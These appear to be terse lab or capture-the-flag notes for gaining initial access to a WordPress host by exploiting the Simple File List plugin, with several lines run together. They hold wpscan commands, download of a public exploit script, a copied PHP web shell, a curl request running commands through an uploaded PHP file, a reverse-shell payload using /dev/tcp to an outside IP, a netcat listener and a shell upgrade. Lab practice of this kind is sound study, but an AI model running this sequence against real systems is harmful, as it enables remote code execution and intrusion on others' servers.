Scanning [Initial-Access]
wpscan --url http://$nukem --api-token <You_Token>



Other exploit.

Other exploit {Worked }







Last updated
wpscan --url http://$nukem --api-token <You_Token>











Last updated
wget https://raw.githubusercontent.com/RandomRobbieBF/simple-file-list-rce/refs/heads/master/simple.py
locate simple backdoor php
cp /usr/share/webshells/php/simple-backdoor.php .
mv simple-backdoor.php shell.phpwget "https://img.freepik.com/premium-psd/png-fantasy-flower-neon-art-illustration_53876-607319.jpg?semt=ais_hybrid" -O image.jpg
lssearchsploit -m 48979mousepad 48979.py
cat 48979.py | grep -ni changedhttps://wpscan.com/vulnerability/365da9c5-a8d0-45f6-863c-1b1926ffd574/python3 Simple_File_list_exploit.pypython3 Simple_File_list_exploit.py http://$nukemcurl -X POST -d "password=0064bb76d86370d20793bb00572fec23&cmd=system('ls');" http://$nukem/wp-content/uploads/simple-file-list/6247.phppayload = '<?php passthru("/bin/bash -i >& /dev/tcp/192.168.45.166/80 0>&1"); ?>' # Changed Payload.sudo rlwrap -cAr nc -lvnp 80python3 Simple_File_list_exploit.py http://$nukem(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')